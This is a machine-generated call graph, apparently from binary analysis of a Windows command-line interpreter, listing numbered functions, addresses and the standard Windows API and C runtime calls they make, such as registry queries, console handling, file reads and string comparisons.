4e2ef 18511->18513 18512->18513 18515 4e307 18512->18515 18513->18515 18516 4e2f3 GetProcAddress 18513->18516 18515->18510 18517 4e30b SetThreadLocale 18515->18517 18516->18515 18517->18452 18520 51f91 18519->18520 18521 50a31 18519->18521 18520->18521 18522 51fab VirtualQuery 18520->18522 18525 51f1a GetConsoleOutputCP GetCPInfo 18521->18525 18522->18521 18524 51fbd 18522->18524 18523 51fc7 VirtualQuery 18523->18521 18523->18524 18524->18521 18524->18523 18526 5f185 GetThreadLocale 18525->18526 18527 51f39 memset 18525->18527 18529 5f196 18526->18529 18528 51f5a 18527->18528 18527->18529 18528->18460 18530 5f20b 18529->18530 18531 5f1ee memset 18529->18531 18530->18460 18531->18529 18533 4e310 12 API calls 18532->18533 18534 4884f 18533->18534 18729 4a9d4 GetEnvironmentStringsW 18534->18729 18538 4885e 18743 48273 18538->18743 18541 48873 18541->18541 18542 48b2f 18541->18542 18765 51a05 18541->18765 18544 478e4 448 API calls 18542->18544 18546 48b42 18544->18546 19064 57d18 18546->19064 18547 488a5 GetCommandLineW 18548 488b8 18547->18548 18770 4e3f0 18548->18770 18553 488e1 18781 48e9e 18553->18781 18599 4e357 _get_osfhandle GetConsoleMode 18598->18599 18600 4e343 18598->18600 18602 4e372 18599->18602 18605 4e3a0 GetConsoleOutputCP GetCPInfo 18599->18605 18600->18599 18601 4e3bc _get_osfhandle SetConsoleMode 18600->18601 18601->18599 18604 4e3df 18601->18604 18603 4e381 _get_osfhandle SetConsoleMode 18602->18603 18602->18605 18603->18605 18604->18599 18606 5dc1d _get_osfhandle SetConsoleMode 18604->18606 18605->18493 18606->18599 18608 4c594 18607->18608 18609 4c5d3 18607->18609 18608->18609 18610 4c59e GetProcessHeap RtlFreeHeap 18608->18610 18611 4c695 VirtualFree 18609->18611 18612 4c5fe _setjmp3 18609->18612 18610->18608 18610->18609 18611->18609 18613 4c666 18611->18613 18614 4c683 18612->18614 18615 4c63c 18612->18615 18616 4c66f 18613->18616 20272 68959 18613->20272 18614->18495 20252 4a8c4 18615->20252 18616->18614 20281 68791 18616->20281 18619 4c64d 18619->18616 20263 4cc70 18619->20263 18622 5d0f0 18622->18622 18624 4e48a 18623->18624 18625 4e517 18623->18625 18624->18625 18626 4e4cc 18624->18626 18627 4e4ae memset 18624->18627 18625->18495 18629 4e5ad 18626->18629 18630 4e501 18626->18630 18637 4e4d9 18626->18637 20958 4e670 18627->20958 18633 4dcd0 448 API calls 18629->18633 18630->18625 18643 4e670 457 API calls 18630->18643 18631 4e572 20991 49ef2 memset 18631->20991 18632 4e4e9 18634 4e531 18632->18634 18635 4e4ef 18632->18635 18636 4e5b7 18633->18636 18640 4e544 18634->18640 18641 4e55f 18634->18641 20885 4ad60 GetConsoleTitleW 18635->20885 18636->18630 18648 4e627 18636->18648 21096 4ed90 18636->21096 18637->18631 18637->18632 18645 4e54c 18640->18645 18646 4e588 18640->18646 20986 4ab50 18641->20986 18643->18625 18644 4e583 18644->18630 18650 4e554 18645->18650 18651 4e592 18645->18651 21041 50390 18646->21041 21130 557ea 18648->21130 20973 503b0 18650->20973 18657 4e4f6 18651->18657 21044 50740 18651->21044 18655 4e631 18655->18630 18662 4dcd0 448 API calls 18655->18662 18657->18630 18660 4a125 2 API calls 18657->18660 18658 4e5dd 18661 4f410 464 API calls 18658->18661 18660->18630 18663 4e5eb 18661->18663 18664 4e641 18662->18664 18663->18648 18665 4e5f0 18663->18665 18664->18630 18666 4e64b 18664->18666 18667 49ef2 459 API calls 18665->18667 18668 4ec2e 448 API calls 18666->18668 18669 4e5f9 18667->18669 18668->18665 18669->18630 21100 52081 18669->21100 18673 4790c 448 API calls 18672->18673 18674 463dc 18673->18674 18675 64840 GetStdHandle 18674->18675 18676 463bd 448 API calls 18675->18676 18677 6485e 18676->18677 18678 648c5 18677->18678 18679 4dd98 6 API calls 18677->18679 18680 49950 448 API calls 18678->18680 18683 6486b 18679->18683 18681 648cf 18680->18681 18681->18465 18682 648b5 18685 64799 448 API calls 18682->18685 18683->18682 18684 64878 FlushConsoleInputBuffer _getch 18683->18684 18684->18678 18686 64891 EnterCriticalSection LeaveCriticalSection 18684->18686 18685->18678 18686->18678 22581 51ea6 18687->22581 18689 51e7c 18690 51e82 18689->18690 18691 48bc7 446 API calls 18689->18691 18690->18465 18692 51e92 GetProcessHeap RtlFreeHeap 18691->18692 18692->18690 18694 4ddbd 18693->18694 18697 4ddca 18693->18697 18694->18478 18695 4ddd6 GetStdHandle 18696 4ddde AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18695->18696 18696->18694 18697->18695 18697->18696 22589 5643a NtOpenThreadToken 18698->22589 18701 61ef3 RtlNtStatusToDosError SetLastError 18703 61f01 18701->18703 18702 56302 18702->18703 18704 61f51 18702->18704 18705 56319 18702->18705 18707 4ab7f 2 API calls 18703->18707 18721 61fdc 18703->18721 18706 61f59 GetConsoleTitleW 18704->18706 22598 5640a FormatMessageW 18705->22598 18709 61f79 wcsstr 18706->18709 18712 563c1 18706->18712 18728 56395 18707->18728 18709->18712 18713 61f92 18709->18713 18710 61f3d 18715 478e4 448 API calls 18710->18715 18711 563d8 18716 563e2 LocalFree 18711->18716 18717 563e9 18711->18717 18712->18711 18714 4dc60 2 API calls 18712->18714 18712->18721 18718 61fa0 wcsstr 18713->18718 18714->18711 18719 61f4a 18715->18719 18716->18717 18717->18710 18720 563f1 18717->18720 18718->18712 18718->18718 18719->18488 18723 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18720->18723 18722 56332 18722->18710 18722->18711 18725 4dcd0 448 API calls 18722->18725 18726 56400 18723->18726 18724 563b4 SetConsoleTitleW 18724->18712 18727 56369 18725->18727 18726->18488 18727->18706 18727->18711 18727->18728 18728->18710 18728->18712 18728->18724 18730 4a9e6 18729->18730 18731 48854 18729->18731 18732 4a9ee GetProcessHeap RtlAllocateHeap 18730->18732 18735 48b96 GetProcessHeap HeapAlloc 18731->18735 18733 4aa06 memcpy 18732->18733 18734 4aa11 FreeEnvironmentStringsW 18732->18734 18733->18734 18734->18731 18736 48bb4 18735->18736 18737 5b5ce 18735->18737 18738 4a9d4 5 API calls 18736->18738 18737->18538 18739 48bb9 18738->18739 18740 5b5b2 GetProcessHeap RtlFreeHeap 18739->18740 18741 48bc3 18739->18741 18742 478e4 448 API calls 18740->18742 18741->18538 18742->18737 18763 48282 18743->18763 18744 482bd RegOpenKeyExW 18745 482e1 RegQueryValueExW 18744->18745 18744->18763 18747 48321 RegQueryValueExW 18745->18747 18745->18763 18746 48552 time srand 18748 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18746->18748 18749 48371 RegQueryValueExW 18747->18749 18747->18763 18751 48570 GetCommandLineW 18748->18751 18750 483ab RegQueryValueExW 18749->18750 18749->18763 18753 483fb RegQueryValueExW 18750->18753 18750->18763 18751->18541 18752 5b11a _wtol 18752->18747 18755 4846c RegQueryValueExW 18753->18755 18753->18763 18754 5b146 _wtol 18754->18749 18755->18763 18756 5b18e _wtol 18756->18750 18757 5b1ba wcstol 18757->18763 18758 5b1dc wcstol 18758->18763 18759 5b218 wcstol 18759->18763 18760 484fa RegQueryValueExW 18761 48534 RegCloseKey 18760->18761 18760->18763 18761->18763 18762 5b28c ExpandEnvironmentStringsW 18762->18763 18763->18744 18763->18746 18763->18747 18763->18749 18763->18750 18763->18752 18763->18753 18763->18754 18763->18755 18763->18756 18763->18757 18763->18758 18763->18759 18763->18760 18763->18761 18763->18762 19068 4acb0 18763->19068 19078 56e25 18765->19078 18767 51a27 18768 4889a 18767->18768 18769 51a2f memset 18767->18769 18768->18542 18768->18547 18769->18768 18771 4e405 18770->18771 18778 488d9 18770->18778 18772 56e25 4 API calls 18771->18772 18773 4e422 18772->18773 18774 4e42d 18773->18774 18775 5dc4a 18773->18775 18777 5dc6b ??_V@YAXPAX 18774->18777 18779 4e441 memset 18774->18779 19090 634d4 18775->19090 18778->18542 18778->18553 18779->18778 18782 48ec1 GetCurrentDirectoryW 18781->18782 18783 48ede towupper 18781->18783 18784 48ec9 18782->18784 19160 4ec2e GetEnvironmentVariableW 18783->19160 18786 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18784->18786 18788 488fc 18786->18788 18790 500e9 memset 18788->18790 18789 5b787 towupper 18791 4e3f0 17 API calls 18790->18791 18792 5013e 18791->18792 18793 5e615 18792->18793 18794 50146 18792->18794 18797 51e70 448 API calls 18793->18797 18799 5e61f exit 18793->18799 18795 5e627 18794->18795 18796 50151 GetModuleFileNameW 18794->18796 19303 4a976 18795->19303 18798 4ec2e 448 API calls 18796->18798 18797->18793 18800 50168 18798->18800 18799->18795 18800->18795 18802 50170 18800->18802 18804 4ec2e 448 API calls 18802->18804 18803 5e63e 18807 4a976 8 API calls 18803->18807 18805 5017c 18804->18805 18805->18803 18806 50184 18805->18806 18808 4ec2e 448 API calls 18806->18808 18809 5e64f 18807->18809 18810 50190 18808->18810 18813 4a976 8 API calls 18809->18813 18810->18809 19065 57d1d 19064->19065 19066 51e70 448 API calls 19065->19066 19067 57d28 exit 19065->19067 19066->19065 19069 4acc0 19068->19069 19069->19069 19072 4dcd0 19069->19072 19071 4acd8 19071->18763 19073 4dcde GetProcessHeap HeapAlloc 19072->19073 19074 5d9da 19072->19074 19073->19074 19075 4dcf6 19073->19075 19076 478e4 446 API calls 19074->19076 19075->19071 19077 5d9e3 19076->19077 19077->19071 19079 56e30 __EH_prolog3_catch 19078->19079 19082 5742d 19079->19082 19081 56e48 19081->18767 19083 57441 malloc 19082->19083 19084 57434 _callnewh 19083->19084 19085 5744f 19083->19085 19084->19083 19086 57451 19084->19086 19085->19081 19089 574d1 ??0exception@@QAE@ABQBDH 19086->19089 19088 577ec _CxxThrowException 19089->19088 19093 6345e 19090->19093 19096 632e4 19093->19096 19097 632f6 19096->19097 19104 62e74 19097->19104 19100 633a9 19101 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19100->19101 19103 633ba 19101->19103 19103->18778 19105 62ea3 19104->19105 19106 62ead 19104->19106 19105->19106 19107 6345e 9 API calls 19105->19107 19108 62f1d GetCurrentThreadId 19106->19108 19107->19106 19109 62f6c 19108->19109 19110 63061 19109->19110 19120 62e37 19109->19120 19113 63036 OutputDebugStringW 19115 62fe7 19113->19115 19115->19100 19116 6392b 19115->19116 19117 63941 19116->19117 19118 6394c memset 19116->19118 19117->19118 19119 6397a 19118->19119 19121 62e42 19120->19121 19123 62e4e 19120->19123 19122 62e5d IsDebuggerPresent 19121->19122 19121->19123 19122->19123 19123->19113 19123->19115 19124 62859 19123->19124 19127 62885 19124->19127 19134 62a23 19124->19134 19125 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19126 62a60 19125->19126 19126->19113 19128 6290d FormatMessageW 19127->19128 19127->19134 19129 62963 19128->19129 19130 6294c 19128->19130 19132 63067 _vsnwprintf 19129->19132 19153 63067 19130->19153 19133 6295e 19132->19133 19134->19125 19156 49a8d 19153->19156 19158 49a98 19156->19158 19161 4ec64 19160->19161 19163 48f0d 19160->19163 19162 4ec71 _wcsicmp 19161->19162 19161->19163 19164 4ec87 _wcsicmp 19162->19164 19174 4ed59 19162->19174 19163->18784 19163->18789 19165 4ec9d _wcsicmp 19164->19165 19169 4ed47 19164->19169 19167 4ecb3 _wcsicmp 19165->19167 19165->19169 19166 48e9e 436 API calls 19168 4ed6c 19166->19168 19170 5ddef GetCommandLineW 19167->19170 19171 4ecc9 _wcsicmp 19167->19171 19214 46854 19168->19214 19210 49abf 19169->19210 19170->19163 19171->19168 19173 4ecdf _wcsicmp 19171->19173 19175 4ed24 19173->19175 19176 4ecf1 _wcsicmp 19173->19176 19174->19166 19185 49310 19175->19185 19178 4ed07 _wcsicmp 19176->19178 19179 5ddfa rand 19176->19179 19178->19163 19182 5de06 GetNumaHighestNodeNumber 19178->19182 19179->19169 19180 4ed30 19180->19163 19253 56c78 19180->19253 19182->19169 19186 5bbbc 19185->19186 19187 4933b GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19185->19187 19256 648d7 19186->19256 19188 4938d 19187->19188 19189 5bbd9 19187->19189 19191 5bbcc 19188->19191 19192 493cd 19188->19192 19205 5bbd1 19189->19205 19262 48791 GetUserDefaultLCID 19189->19262 19196 49950 441 API calls 19191->19196 19195 49abf _vsnwprintf 19192->19195 19198 493d6 19195->19198 19196->19205 19201 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19198->19201 19199 49abf _vsnwprintf 19199->19205 19200 5bc11 19207 5bd10 19200->19207 19209 5bcd0 memmove 19200->19209 19203 493fe 19201->19203 19202 48791 GetUserDefaultLCID 19203->19180 19205->19199 19206 5bdbf 19205->19206 19264 4998d 19205->19264 19207->19202 19209->19200 19211 49acd 19210->19211 19212 49aee 19211->19212 19300 49afb _vsnwprintf 19211->19300 19212->19174 19215 4688f GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19214->19215 19246 46b0c 19214->19246 19216 468ec 19215->19216 19233 5a562 19215->19233 19218 48791 GetUserDefaultLCID 19216->19218 19217 648d7 6 API calls 19219 5a4c2 19217->19219 19220 46906 GetLocaleInfoW 19218->19220 19219->19180 19242 46915 19220->19242 19221 5a5f9 19226 49abf _vsnwprintf 19221->19226 19222 5a5df realloc 19222->19221 19222->19233 19223 46966 19224 48791 GetUserDefaultLCID 19223->19224 19225 4698e GetDateFormatW 19224->19225 19227 46a96 19225->19227 19228 4699d 19225->19228 19229 5a62a 19226->19229 19228->19227 19234 5a63e 19229->19234 19244 5a64d 19229->19244 19231 478e4 434 API calls 19231->19233 19233->19221 19233->19222 19233->19231 19237 49950 434 API calls 19234->19237 19249 5a649 19237->19249 19241 5a523 memmove 19241->19242 19242->19223 19242->19241 19242->19242 19245 46a75 memmove 19242->19245 19248 49950 434 API calls 19244->19248 19245->19242 19246->19217 19248->19249 19302 56b40 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19253->19302 19255 4ed88 19255->19170 19257 648f0 GetSystemTime 19256->19257 19258 648fc 19256->19258 19259 6493b SystemTimeToFileTime 19257->19259 19258->19259 19260 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19259->19260 19261 5bbc7 19260->19261 19261->19180 19263 487a5 GetLocaleInfoW 19262->19263 19263->19200 19265 499a0 19264->19265 19267 499d0 19264->19267 19266 49a11 6 API calls 19265->19266 19268 499a8 19266->19268 19267->19205 19301 49b1f 19300->19301 19301->19212 19302->19255 19304 4a986 19303->19304 19305 4a9a2 SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 19303->19305 19304->19305 19306 4a9d4 5 API calls 19305->19306 19307 4a9c5 19306->19307 19307->18803 20253 4a8e6 20252->20253 20254 4cc70 549 API calls 20253->20254 20255 4a8f8 20254->20255 20256 4a90c 20255->20256 20257 580ba longjmp 20255->20257 20298 4bab0 20256->20298 20258 580c8 20257->20258 20311 4d660 EnterCriticalSection LeaveCriticalSection 20258->20311 20261 580cd 20261->18619 20262 4a911 20262->18619 20264 4cc7a 20263->20264 20265 4cf10 548 API calls 20264->20265 20266 4cc8a 20265->20266 20267 5d434 longjmp 20266->20267 20268 4cc9b 20266->20268 20267->20268 20269 49950 448 API calls 20268->20269 20271 4ccc4 20268->20271 20270 5d45b 20269->20270 20271->18613 20273 68996 20272->20273 20280 6898e 20272->20280 20274 689b2 20273->20274 20275 689a2 20273->20275 20279 478e4 448 API calls 20274->20279 20274->20280 20278 478e4 448 API calls 20275->20278 20276 689ce longjmp 20277 689db 20276->20277 20277->18616 20278->20280 20279->20280 20280->20276 20280->20277 20297 687a0 20281->20297 20282 68900 20285 49950 448 API calls 20282->20285 20283 688d2 20876 686e6 20283->20876 20284 68930 20287 49950 448 API calls 20284->20287 20290 6890f 20285->20290 20286 688be 20286->20282 20293 688c3 20286->20293 20291 6892e 20287->20291 20288 49950 448 API calls 20288->20297 20292 68925 20290->20292 20294 49950 448 API calls 20290->20294 20291->18622 20869 6871d 20292->20869 20293->20283 20293->20284 20294->20292 20296 68791 448 API calls 20296->20297 20297->20282 20297->20283 20297->20284 20297->20286 20297->20288 20297->20291 20297->20296 20299 4bac2 20298->20299 20306 4bb19 20298->20306 20300 4baf3 20299->20300 20301 4badc _wcsicmp 20299->20301 20304 4bb56 20300->20304 20396 4ccd0 20300->20396 20301->20300 20303 4bb68 20301->20303 20303->20300 20307 4cc70 549 API calls 20303->20307 20304->20262 20305 4bb15 20305->20262 20306->20299 20308 4cc70 549 API calls 20306->20308 20309 4bb48 20306->20309 20307->20303 20308->20306 20309->20304 20310 4cc70 549 API calls 20309->20310 20310->20299 20312 4d6b0 20311->20312 20313 5d587 20312->20313 20315 4d6c6 EnterCriticalSection LeaveCriticalSection 20312->20315 20316 4d971 20312->20316 20314 5d59b 20313->20314 20317 463bd 448 API calls 20313->20317 20712 6769e 20314->20712 20319 4d6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20315->20319 20320 5d5a8 20315->20320 20690 4da30 20316->20690 20317->20314 20323 4d752 20319->20323 20745 69fcf _get_osfhandle GetFileType 20320->20745 20324 4d81c 20323->20324 20328 5d742 memcmp 20323->20328 20335 4d774 20323->20335 20330 4d9f7 GetLastError 20324->20330 20340 4d82c 20324->20340 20325 5d5be 20327 5d6bd 20325->20327 20331 4dd98 6 API calls 20325->20331 20326 4d980 20326->20261 20327->20323 20329 5d6c6 _get_osfhandle 20327->20329 20337 5d6ef GetLastError 20327->20337 20327->20340 20328->20335 20333 645f9 10 API calls 20329->20333 20330->20340 20332 5d5cd 20331->20332 20332->20327 20334 5d5de 20332->20334 20333->20327 20334->20319 20339 4dd98 6 API calls 20334->20339 20336 5d78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20335->20336 20338 4d7b2 20335->20338 20341 4d7bd SetFilePointer 20335->20341 20336->20338 20346 4d809 20336->20346 20337->20323 20337->20327 20343 4d7ec MultiByteToWideChar 20338->20343 20344 5d7e9 20338->20344 20338->20346 20345 5d5f2 20339->20345 20350 4dd98 6 API calls 20340->20350 20366 4d840 20340->20366 20341->20338 20343->20346 20347 5d7f0 EnterCriticalSection LeaveCriticalSection longjmp 20344->20347 20348 5d6b3 20345->20348 20351 5d607 20345->20351 20346->20324 20346->20347 20347->20340 20348->20319 20349 4d893 20349->20261 20352 5d826 20350->20352 20353 5d610 20351->20353 20354 5d61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20351->20354 20357 69922 448 API calls 20352->20357 20352->20366 20746 67613 _get_osfhandle 20353->20746 20356 64191 448 API calls 20354->20356 20358 5d665 20356->20358 20359 5d84f longjmp 20357->20359 20358->20330 20360 5d66d 20358->20360 20359->20366 20360->20340 20363 5d677 GetLastError 20360->20363 20361 4d8d7 wcschr 20362 4d8f6 20361->20362 20361->20366 20370 4d9e3 20362->20370 20372 4d904 20362->20372 20364 5d69e 20363->20364 20365 5d689 20363->20365 20368 49950 448 API calls 20364->20368 20367 49950 448 API calls 20365->20367 20366->20349 20366->20361 20366->20362 20371 5d68e longjmp 20367->20371 20368->20340 20369 5d908 20369->20261 20370->20316 20376 4d9eb 20370->20376 20371->20364 20372->20369 20374 4dd98 6 API calls 20372->20374 20373 5d8d3 20375 478e4 448 API calls 20373->20375 20378 4d945 20374->20378 20379 5d8df 20375->20379 20376->20373 20377 5d8af 20376->20377 20380 6769e 459 API calls 20376->20380 20381 478e4 448 API calls 20377->20381 20378->20316 20382 4d949 _get_osfhandle SetFilePointer 20378->20382 20383 5d8fb longjmp 20379->20383 20386 4dd98 6 API calls 20379->20386 20384 5d898 20380->20384 20385 5d8be 20381->20385 20382->20316 20393 5d915 20382->20393 20383->20369 20387 49950 448 API calls 20384->20387 20388 69922 448 API calls 20385->20388 20389 5d8f2 20386->20389 20390 5d8a2 20387->20390 20391 5d8c6 longjmp 20388->20391 20389->20383 20751 6a0da 20389->20751 20392 49950 448 API calls 20390->20392 20391->20373 20392->20377 20393->20316 20395 4998d 448 API calls 20393->20395 20395->20316 20397 4cd14 20396->20397 20398 4cce9 20396->20398 20439 4de30 20397->20439 20400 4ccf5 20398->20400 20401 4cde8 20398->20401 20403 4cd01 20400->20403 20404 4cdf2 20400->20404 20510 4e090 20401->20510 20407 4cd12 20403->20407 20436 4e230 20403->20436 20513 4e210 20404->20513 20405 4cddd 20405->20305 20407->20405 20455 4cf10 _setjmp3 20407->20455 20410 4cd48 20411 5d478 longjmp 20410->20411 20412 4cd59 20410->20412 20413 5d48f 20411->20413 20412->20413 20425 4cd85 20412->20425 20414 49950 448 API calls 20413->20414 20415 5d49f 20414->20415 20416 69922 448 API calls 20415->20416 20417 5d4ac longjmp 20416->20417 20420 5d4ba 20417->20420 20418 4ce4a 20422 4cc70 549 API calls 20418->20422 20427 4ce61 20418->20427 20431 4ce6c 20418->20431 20419 4cdd2 20421 4cf10 548 API calls 20419->20421 20423 49950 448 API calls 20420->20423 20421->20405 20422->20418 20426 5d4ca 20423->20426 20424 4dcd0 448 API calls 20428 4ce89 20424->20428 20425->20418 20425->20419 20426->20305 20429 4cf10 548 API calls 20427->20429 20428->20415 20430 4ce93 20428->20430 20429->20431 20432 4cc70 549 API calls 20430->20432 20431->20405 20431->20424 20433 4ceac 20432->20433 20434 4bab0 575 API calls 20433->20434 20435 4cec6 20433->20435 20434->20435 20435->20305 20437 4ccd0 577 API calls 20436->20437 20438 4e247 20437->20438 20438->20407 20516 4ded0 20439->20516 20441 4de4a 20442 5da16 20441->20442 20443 4de52 20441->20443 20445 4cc70 549 API calls 20442->20445 20534 4e0b0 20443->20534 20447 4de57 20445->20447 20446 4de64 20448 4cc70 549 API calls 20446->20448 20453 4de92 20446->20453 20447->20446 20450 68959 449 API calls 20447->20450 20449 4de75 20448->20449 20451 4ded0 555 API calls 20449->20451 20450->20446 20452 4de80 20451->20452 20452->20453 20454 4cf10 548 API calls 20452->20454 20453->20407 20454->20453 20456 5d56e 20455->20456 20460 4cf38 20455->20460 20457 4d03b 20458 4d048 20457->20458 20461 49950 448 API calls 20457->20461 20458->20410 20459 4cf9e 20464 4d600 533 API calls 20459->20464 20460->20456 20460->20457 20460->20459 20468 4cf86 wcschr 20460->20468 20502 4d0fa 20460->20502 20685 4d600 20460->20685 20463 5d4ca 20461->20463 20463->20410 20466 4cfb7 20464->20466 20465 4cf67 iswspace 20465->20460 20467 5d4d2 20466->20467 20472 4cfc7 20466->20472 20469 4d600 533 API calls 20467->20469 20467->20502 20468->20459 20468->20460 20470 5d4ea 20469->20470 20480 4d600 533 API calls 20470->20480 20471 4cfe2 iswdigit 20473 4cfff 20471->20473 20476 4d341 20471->20476 20472->20471 20474 4d0a6 20472->20474 20479 4d4a7 20472->20479 20472->20502 20482 4d600 533 API calls 20473->20482 20491 4d027 20473->20491 20474->20476 20483 4d0b5 iswspace 20474->20483 20484 4d0e8 iswdigit 20474->20484 20475 4d218 20475->20410 20476->20471 20477 4d600 533 API calls 20476->20477 20476->20502 20477->20476 20478 4d190 20478->20475 20481 478e4 448 API calls 20478->20481 20485 4d600 533 API calls 20479->20485 20480->20476 20481->20456 20488 4d2a5 20482->20488 20483->20471 20486 4d0c7 20483->20486 20487 4d310 20484->20487 20484->20502 20492 4d4ac 20485->20492 20490 4d0d0 wcschr 20486->20490 20486->20502 20487->20476 20489 4d328 iswspace 20487->20489 20497 4d600 533 API calls 20488->20497 20505 4d2ae 20488->20505 20489->20476 20493 4d484 20489->20493 20490->20471 20490->20484 20491->20410 20492->20457 20492->20470 20492->20471 20492->20502 20498 4a62f wcschr 20493->20498 20494 4d600 533 API calls 20494->20502 20495 4d1b4 iswspace 20495->20478 20495->20502 20496 4d16d iswdigit 20496->20502 20497->20505 20498->20476 20499 4d23e iswspace 20501 4d253 wcschr 20499->20501 20499->20502 20500 4d1d1 wcschr 20500->20478 20500->20496 20501->20502 20502->20473 20502->20478 20502->20494 20502->20495 20502->20496 20502->20499 20502->20500 20503 4d600 533 API calls 20504 4d405 iswspace 20503->20504 20504->20505 20505->20491 20505->20503 20506 4a62f wcschr 20505->20506 20507 4d426 iswdigit 20505->20507 20506->20505 20507->20491 20508 4d438 20507->20508 20509 4d600 533 API calls 20508->20509 20509->20491 20511 4ccd0 577 API calls 20510->20511 20512 4e0a7 20511->20512 20512->20407 20514 4ccd0 577 API calls 20513->20514 20515 4e227 20514->20515 20515->20407 20529 4df00 20516->20529 20517 4df16 iswdigit 20519 4df27 20517->20519 20517->20529 20518 4dcd0 448 API calls 20518->20529 20520 4df2f 20519->20520 20523 4cf10 548 API calls 20519->20523 20520->20441 20521 4df63 iswdigit 20521->20529 20522 5daf9 longjmp 20524 4e26b 20522->20524 20523->20520 20524->20441 20525 5daec 20526 68959 449 API calls 20525->20526 20528 5daf1 20526->20528 20528->20522 20529->20517 20529->20518 20529->20519 20529->20521 20529->20522 20529->20524 20529->20525 20530 4e059 iswdigit 20529->20530 20531 68959 449 API calls 20529->20531 20532 4acb0 448 API calls 20529->20532 20533 4cc70 549 API calls 20529->20533 20608 4a931 20529->20608 20530->20529 20531->20529 20532->20529 20533->20529 20535 4e0c1 _wcsicmp 20534->20535 20542 4e15b 20534->20542 20536 4e203 _wcsicmp 20535->20536 20537 4e0dc _wcsicmp 20535->20537 20544 52a35 20536->20544 20592 52a63 20536->20592 20537->20536 20538 4e0f7 _wcsicmp 20537->20538 20538->20542 20543 4e112 _wcsicmp 20538->20543 20540 4dcd0 448 API calls 20545 4e17d 20540->20545 20541 68959 449 API calls 20546 4e1f5 20541->20546 20542->20540 20571 4e1db 20542->20571 20543->20542 20547 4e12d _wcsicmp 20543->20547 20627 4bb90 20544->20627 20549 59ca7 20545->20549 20559 4e187 20545->20559 20546->20447 20547->20542 20552 4e144 _wcsicmp 20547->20552 20551 69922 448 API calls 20549->20551 20550 4e1bf 20557 4a8c4 563 API calls 20550->20557 20554 59cac longjmp 20551->20554 20552->20542 20553 52a47 20558 4cc70 549 API calls 20553->20558 20553->20592 20556 45e22 20554->20556 20555 4cc70 549 API calls 20555->20559 20560 59cc3 20556->20560 20564 45da6 448 API calls 20556->20564 20561 4e1c9 20557->20561 20562 52a5b 20558->20562 20559->20550 20559->20555 20563 4e1b4 20559->20563 20560->20447 20565 4e1e0 20561->20565 20569 4cc70 549 API calls 20561->20569 20644 49907 20562->20644 20567 4cf10 548 API calls 20563->20567 20568 45e31 20564->20568 20565->20447 20567->20550 20570 48f21 448 API calls 20568->20570 20569->20571 20574 45e3a 20570->20574 20571->20541 20571->20565 20572 52ae4 20576 52af4 iswspace 20572->20576 20577 5f500 20572->20577 20573 52a7c _wcsicmp 20575 52a92 _wcsicmp 20573->20575 20573->20592 20578 45e1d 20574->20578 20582 68c50 448 API calls 20574->20582 20579 52aa8 _wcsicmp 20575->20579 20575->20592 20576->20577 20581 52b0b 20576->20581 20580 68959 449 API calls 20577->20580 20578->20447 20583 52abe _wcsicmp 20579->20583 20579->20592 20584 52b81 20580->20584 20585 4a62f wcschr 20581->20585 20600 45e68 20582->20600 20583->20592 20595 52ad7 20583->20595 20589 68959 449 API calls 20584->20589 20607 52b8c 20584->20607 20586 52b1f 20585->20586 20586->20577 20591 52b34 20586->20591 20587 4cc70 549 API calls 20587->20592 20588 5f4d2 20590 69922 448 API calls 20588->20590 20593 5f50f 20589->20593 20594 5f4d7 longjmp 20590->20594 20651 52c23 20591->20651 20592->20572 20592->20573 20592->20587 20592->20588 20596 68959 449 API calls 20592->20596 20597 4dcd0 448 API calls 20592->20597 20593->20593 20594->20595 20595->20572 20601 68959 449 API calls 20595->20601 20596->20592 20597->20592 20599 52b4b 20655 533ca 20599->20655 20600->20447 20601->20572 20607->20447 20609 4cc70 549 API calls 20608->20609 20610 4a93b 20609->20610 20612 68959 449 API calls 20610->20612 20614 4a942 20610->20614 20611 4dcd0 448 API calls 20613 4a94f 20611->20613 20612->20614 20615 4a959 20613->20615 20616 69922 448 API calls 20613->20616 20614->20611 20614->20613 20615->20529 20617 59cac longjmp 20616->20617 20618 45e22 20617->20618 20619 59cc3 20618->20619 20620 45da6 448 API calls 20618->20620 20619->20529 20621 45e31 20620->20621 20622 48f21 448 API calls 20621->20622 20623 45e3a 20622->20623 20624 45e1d 20623->20624 20625 68c50 448 API calls 20623->20625 20624->20529 20626 45e68 20625->20626 20626->20529 20628 4dcd0 448 API calls 20627->20628 20629 4bba1 20628->20629 20631 4dcd0 448 API calls 20629->20631 20634 4bbc1 20629->20634 20630 69922 448 API calls 20632 59cac longjmp 20630->20632 20631->20634 20633 45e22 20632->20633 20635 59cc3 20633->20635 20637 45da6 448 API calls 20633->20637 20634->20630 20636 4bbde 20634->20636 20635->20553 20636->20553 20638 45e31 20637->20638 20639 48f21 448 API calls 20638->20639 20640 45e3a 20639->20640 20641 45e1d 20640->20641 20642 68c50 448 API calls 20640->20642 20641->20553 20643 45e68 20642->20643 20643->20553 20645 4bc30 448 API calls 20644->20645 20646 49938 20645->20646 20675 4a800 20646->20675 20649 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20650 4994e 20649->20650 20650->20592 20652 4cc70 549 API calls 20651->20652 20653 52c2f _wcsicmp 20652->20653 20654 52c41 20653->20654 20654->20599 20656 4cc70 549 API calls 20655->20656 20657 533e2 